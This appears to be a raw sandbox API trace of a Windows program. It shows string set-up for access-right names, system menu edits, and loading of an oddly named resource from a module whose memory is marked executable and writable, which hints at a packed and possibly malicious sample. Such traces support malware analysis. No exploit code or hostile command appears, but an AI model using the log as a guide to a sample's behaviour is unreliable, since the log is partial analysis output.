[0170.563] SysReAllocStringLen (in: pbstr=0x28de410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x28de410*="PROCESS_SET_SESSIONID") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x28de400*="PROCESS_CREATE_THREAD") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x28de3f0*="PROCESS_TERMINATE") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x28de3e0*="PROCESS_ALL_ACCESS") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28de3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28de3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28de3b0*="STANDARD_RIGHTS_READ") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28de3a0*="STANDARD_RIGHTS_ALL") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28de390*="DELETE") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28de380*="READ_CONTROL") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28de370*="WRITE_OWNER") returned 1
[0170.563] SysReAllocStringLen (in: pbstr=0x28de360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28de360*="WRITE_DAC") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x28de350*="PERM_FILE_CREATE") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x28de340*="PERM_FILE_WRITE") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x28de330*="PERM_FILE_READ") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28de320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28de310*="STANDARD_RIGHTS_WRITE") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28de300*="STANDARD_RIGHTS_READ") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28de2f0*="STANDARD_RIGHTS_ALL") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28de2e0*="DELETE") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28de2d0*="READ_CONTROL") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28de2c0*="WRITE_OWNER") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28de2b0*="WRITE_DAC") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x28de2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x28de290*="PRINTER_ACCESS_USE") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x28de280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x28de270*="SERVER_ACCESS_ENUMERATE") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x28de260*="SERVER_ACCESS_ADMINISTER") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x28de250*="PRINTER_ALL_ACCESS") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x28de240*="PRINTER_EXECUTE") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x28de230*="PRINTER_WRITE") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x28de220*="PRINTER_READ") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x28de210*="PRINTER_ALL_ACCESS") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28de200*="DELETE") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28de1f0*="READ_CONTROL") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28de1e0*="WRITE_OWNER") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28de1d0*="WRITE_DAC") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x28de1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x28de1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x28de1a0*="SC_MANAGER_LOCK") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x28de190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x28de180*="SC_MANAGER_CONNECT") returned 1
[0170.564] SysReAllocStringLen (in: pbstr=0x28de170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x28de170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x28de160*="SC_MANAGER_ALL_ACCESS") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28de150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28de140*="STANDARD_RIGHTS_WRITE") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28de130*="STANDARD_RIGHTS_READ") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28de120*="STANDARD_RIGHTS_ALL") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28de110*="DELETE") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28de100*="READ_CONTROL") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28de0f0*="WRITE_OWNER") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28de0e0*="WRITE_DAC") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x28de0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x28de0c0*="SERVICE_STOP") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x28de0b0*="SERVICE_START") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x28de0a0*="SERVICE_QUERY_STATUS") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x28de090*="SERVICE_QUERY_CONFIG") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x28de080*="SERVICE_PAUSE_CONTINUE") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x28de070*="SERVICE_INTERROGATE") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x28de060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x28de050*="SERVICE_CHANGE_CONFIG") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x28de040*="SERVICE_ALL_ACCESS") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28de030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28de020*="STANDARD_RIGHTS_WRITE") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28de010*="STANDARD_RIGHTS_READ") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28de000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28de000*="STANDARD_RIGHTS_ALL") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28ddff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28ddff0*="DELETE") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28ddfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28ddfe0*="READ_CONTROL") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28ddfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28ddfd0*="WRITE_OWNER") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28ddfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28ddfc0*="WRITE_DAC") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28ddfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x28ddfb0*="KEY_SET_VALUE") returned 1
[0170.565] SysReAllocStringLen (in: pbstr=0x28ddfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x28ddfa0*="KEY_CREATE_LINK") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddf90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x28ddf90*="KEY_CREATE_SUB_KEY") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddf80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x28ddf80*="KEY_NOTIFY") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddf70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x28ddf70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddf60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x28ddf60*="KEY_QUERY_VALUE") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddf50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28ddf50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddf40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28ddf40*="STANDARD_RIGHTS_WRITE") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddf30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x28ddf30*="STANDARD_RIGHTS_READ 2") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddf20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x28ddf20*="STANDARD_RIGHTS_ALL 1") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddf10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28ddf10*="DELETE") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddf00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28ddf00*="READ_CONTROL") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddef0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28ddef0*="WRITE_OWNER") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28ddee0*="WRITE_DAC") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x28dded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x28ddec0*="DESKTOP_WRITEOBJECTS") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddeb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x28ddeb0*="DESKTOP_JOURNALRECORD") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x28ddea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dde90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x28dde90*="DESKTOP_HOOKCONTROL") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dde80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x28dde80*="DESKTOP_CREATEWINDOW") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dde70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x28dde70*="DESKTOP_CREATEMENU") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dde60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x28dde60*="DESKTOP_READOBJECTS") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dde50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x28dde50*="DESKTOP_ENUMERATE") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dde40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28dde40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dde30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28dde30*="STANDARD_RIGHTS_WRITE") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dde20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28dde20*="STANDARD_RIGHTS_READ") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dde10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28dde10*="STANDARD_RIGHTS_ALL") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dde00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28dde00*="DELETE") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28dddf0*="READ_CONTROL") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28ddde0*="WRITE_OWNER") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28dddd0*="WRITE_DAC") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x28dddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28dddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x28dddb0*="WINSTA_READSCREEN") returned 1
[0170.566] SysReAllocStringLen (in: pbstr=0x28ddda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x28ddda0*="WINSTA_READATTRIBUTES") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x28ddd90*="WINSTA_EXITWINDOWS") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x28ddd80*="WINSTA_ENUMERATE") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x28ddd70*="WINSTA_ENUMDESKTOPS") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x28ddd60*="WINSTA_CREATEDESKTOP") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x28ddd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x28ddd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28ddd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28ddd20*="STANDARD_RIGHTS_WRITE") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28ddd10*="STANDARD_RIGHTS_READ") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x28ddd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28ddcf0*="READ_CONTROL") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x28ddce0*="SI_ACCESS_SPECIFIC") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28ddcd0*="WRITE_DAC") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x28ddcc0*="FILE_DELETE") returned 1
[0170.567] SysReAllocStringLen (in: pbstr=0x28ddcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x28ddcb0*="FILE_DELETE_CHILD") returned 1
[0170.568] SetClassLongA (hWnd=0xf01e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0170.568] GetSystemMenu (hWnd=0xf01e8, bRevert=0) returned 0xd01f3
[0170.569] DeleteMenu (hMenu=0xd01f3, uPosition=0xf030, uFlags=0x0) returned 1
[0170.569] DeleteMenu (hMenu=0xd01f3, uPosition=0xf000, uFlags=0x0) returned 1
[0170.569] DeleteMenu (hMenu=0xd01f3, uPosition=0xf010, uFlags=0x0) returned 1
[0170.569] GetCurrentThreadId () returned 0x518
[0170.569] ResetEvent (hEvent=0xa0) returned 1
[0170.569] GetCurrentThreadId () returned 0x518
[0170.569] GetCurrentThreadId () returned 0x518
[0170.569] GetCurrentThreadId () returned 0x518
[0170.569] ResetEvent (hEvent=0xa0) returned 1
[0170.569] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xaf284, fWinIni=0x0 | out: pvParam=0xaf284) returned 1
[0170.569] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xaf284, fWinIni=0x0 | out: pvParam=0xaf284) returned 1
[0170.569] GetSystemMetrics (nIndex=49) returned 16
[0170.569] GetSystemMetrics (nIndex=50) returned 16
[0170.569] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xaf2cc, fWinIni=0x0 | out: pvParam=0xaf2cc) returned 1
[0170.570] IsWindowVisible (hWnd=0xf01e8) returned 0
[0170.570] GetCurrentThreadId () returned 0x518
[0170.570] VirtualQuery (in: lpAddress=0x28b1668, lpBuffer=0xaf19c, dwLength=0x1c | out: lpBuffer=0xaf19c*(BaseAddress=0x28b1000, AllocationBase=0x27f0000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0170.570] FindResourceA (hModule=0x27f0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x28f8990
[0170.570] FindResourceA (hModule=0x27f0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x28f8990
[0170.570] LoadResource (hModule=0x27f0000, hResInfo=0x28f8990) returned 0x28ff044
[0170.570] SizeofResource (hModule=0x27f0000, hResInfo=0x28f8990) returned 0xca5
[0170.570] LockResource (hResData=0x28ff044) returned 0x28ff044
[0170.570] GetCurrentThreadId () returned 0x518
[0170.570] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xaef50, fWinIni=0x0 | out: pvParam=0xaef50) returned 1
[0170.570] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xaef50, fWinIni=0x0 | out: pvParam=0xaef50) returned 1
[0170.570] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xaef50, fWinIni=0x0 | out: pvParam=0xaef50) returned 1
[0170.570] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0xaef50, fWinIni=0x0 | out: pvParam=0xaef50) returned 1
[0170.571] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.571] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef34 | out: lptm=0xaef34) returned 1
[0170.571] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0170.572] CreateFontIndirectA (lplf=0xaeeec) returned 0x4b0a085b
[0170.573] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.573] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef6c | out: lptm=0xaef6c) returned 1
[0170.573] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.573] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.573] GetSystemMetrics (nIndex=6) returned 1
[0170.573] VirtualAlloc (lpAddress=0x2914000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2914000
[0170.573] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.573] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef34 | out: lptm=0xaef34) returned 1
[0170.573] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.573] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef6c | out: lptm=0xaef6c) returned 1
[0170.573] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.573] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.573] GetSystemMetrics (nIndex=6) returned 1
[0170.574] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.574] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef34 | out: lptm=0xaef34) returned 1
[0170.574] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.574] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef6c | out: lptm=0xaef6c) returned 1
[0170.574] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.574] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.574] GetSystemMetrics (nIndex=6) returned 1
[0170.574] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.574] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef34 | out: lptm=0xaef34) returned 1
[0170.574] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.574] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef6c | out: lptm=0xaef6c) returned 1
[0170.574] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.574] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.574] GetSystemMetrics (nIndex=6) returned 1
[0170.575] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.575] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef48 | out: lptm=0xaef48) returned 1
[0170.575] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.575] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef80 | out: lptm=0xaef80) returned 1
[0170.575] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.575] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.575] GetSystemMetrics (nIndex=6) returned 1
[0170.575] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.575] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec4c | out: lptm=0xaec4c) returned 1
[0170.575] SelectObject (hdc=0x6f01071a, h=0x4b0a085b) returned 0x18a002e
[0170.575] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaec84 | out: lptm=0xaec84) returned 1
[0170.575] SelectObject (hdc=0x6f01071a, h=0x18a002e) returned 0x4b0a085b
[0170.575] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.575] GetSystemMetrics (nIndex=6) returned 1
[0170.575] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.575] GetTextMetricsA (in: hdc=0x6f01071a, lptm=0xaef48 | out: lptm=0xaef48) returned 1
